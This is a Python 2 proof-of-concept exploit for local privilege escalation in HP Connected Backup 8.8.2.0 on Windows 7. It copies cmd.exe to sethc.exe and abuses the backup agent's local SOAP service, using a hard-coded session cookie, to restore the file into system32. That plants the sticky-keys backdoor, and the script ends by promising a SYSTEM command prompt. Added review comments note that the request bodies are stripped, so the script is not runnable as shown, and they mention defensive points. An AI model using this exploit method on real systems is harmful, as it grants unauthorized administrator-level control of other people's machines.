#Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64
#
# Proof-of-concept script (Python 2 syntax: bare `print` statements).
# What the code below visibly does:
#   1. copies cmd.exe into C:\hpcb-privesc as sethc.exe,
#   2. drives the backup agent's local SOAP endpoint (http://localhost:16386/)
#      to scan, include and back up that file,
#   3. asks the agent to restore it with an alternate path of C:\Windows\system32
#      and overwrite enabled, so the agent (running as SYSTEM) writes the file
#      into a location the caller could not write itself.
# NOTE(review): in this copy of the file the SOAP envelopes inside the
# triple-quoted request bodies have been stripped (most are empty or contain
# only a base64 path / boolean / PID fragment), so the script as shown is not
# runnable as-is; the comments describe the intent recorded on the page.
# From a defensive standpoint the relevant behaviours are a backup-agent restore
# that targets a system directory and a local HTTP service accepting a fixed
# session cookie; both are things to alert on or remove via vendor update.

import os
import sys
import time
import requests
from bs4 import BeautifulSoup

def send_request(body):
    """POST a SOAP body to the local HP Connected Backup agent and return the response text.

    Args:
        body: the raw request body (XML text in the original, stripped here).

    Returns:
        ``response.text`` when the agent answers HTTP 200.

    Side effects:
        On any non-200 status the function prints a message and terminates the
        whole process via ``sys.exit()`` instead of raising, so callers never
        see a failed request.
    """
    url="http://localhost:16386/"
    # Fixed headers: text/xml content type, an empty SOAPAction and a
    # hard-coded session id. NOTE(review): ``Set-Cookie`` is normally a
    # response header; a client would usually send ``Cookie:``. The author
    # reports this tested OK, so presumably the agent reads it as-is — verify
    # before relying on it.
    headers = {"Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie": "CCSessionID=SessionID11"}
    response = requests.post(url, data=body, headers=headers)
    if response.status_code != requests.codes.ok:
        print "Non-200 response. Exiting..."
        sys.exit()
    else:
        return response.text

def get_tdate(response):
    """Extract the ``m-tdate`` value from an agent response.

    Args:
        response: response text as returned by ``send_request``.

    Returns:
        The ``.string`` content of the first ``<m-tdate>`` element (may be
        ``None`` if that element has no single text child).

    Raises:
        IndexError: if the response contains no ``<m-tdate>`` element, because
        ``findAll(...)[0]`` is indexed unconditionally.
    """
    # "html.parser" is used even though the payload is SOAP/XML; tag names
    # are lower-cased by that parser, hence the lower-case "m-tdate" lookup.
    soup = BeautifulSoup(response, "html.parser")
    tdate = soup.findAll("m-tdate")[0].string
    return tdate

#Copy cmd.exe to world-writeable folder
# Both shell commands go through os.system with fixed, non-user-supplied
# strings; mkdir failing (folder already present) is not checked.
print "HP Connected Backup Privilege Escalation by Peter Lapp(lappsec)"
print "Copying cmd.exe to C:\\hpcb-privesc"
os.system("mkdir C:\\hpcb-privesc")
os.system("copy C:\\Windows\\system32\\cmd.exe C:\\hpcb-privesc\\sethc.exe")
print "Creating backup for C:\\hpcb-privesc\\sethc.exe"
#StartScan required before IncludeFile request will be accepted
send_request("""""")
# Fixed delay rather than polling the agent for scan completion.
time.sleep(3)
#Add file to backup
# The base64 fragment decodes to the path C:\hpcb-privesc\sethc.exe;
# the trailing "true" is the boolean flag that survived extraction.
send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==true""")
print "Initiating Backup"
#Start backup
send_request("""""")
print """Sleeping for 300 seconds to give time for backup to complete. If the script fails after this then change the sleep period to give the backup enough time to complete"""
# No completion check: the script simply waits a fixed 300 s and assumes the
# backup has finished, which is why the message above suggests tuning it.
time.sleep(300)
print "Initiating restore"
#PrepareRetrieve requires valid PID of process running as SYSTEM. PID 456 is common for Windows 7 but if it fails, try another
# The PID is a hard-coded guess; a wrong value surfaces only as a non-200
# response and a process exit inside send_request.
send_request("""456""")
#We have to get the m-TDate value for the file in order for the restore to work correctly
print "Getting m-TDate value"
# Base64 fragment decodes to the folder path C:\hpcb-privesc\ .
fileinfo = send_request("""QzpcaHBjYi1wcml2ZXNjXA==""")
tdate = get_tdate(fileinfo)
print "Adding Restore file"
# tdate is spliced into the request body verbatim (string concatenation,
# no escaping); it comes straight from the agent's own previous response.
send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==false"""+tdate+"""""")
print "Setting alternate restore path to C:\\Windows\\system32\\"
# This is the step that matters defensively: the restore destination is
# redirected from the original location into the system directory.
send_request("""C:\Windows\system32false""")
#Set restore to replace existing file
send_request("""true""")
print "Restoring C:\\hpcb-privesc\\sethc.exe to C:\\Windows\\system32\\sethc.exe"
send_request("""""")
print "If it made it this far without an error, then you should now be able to log out, press SHIFT 5 times and be given a command prompt as SYSTEM. Enjoy!"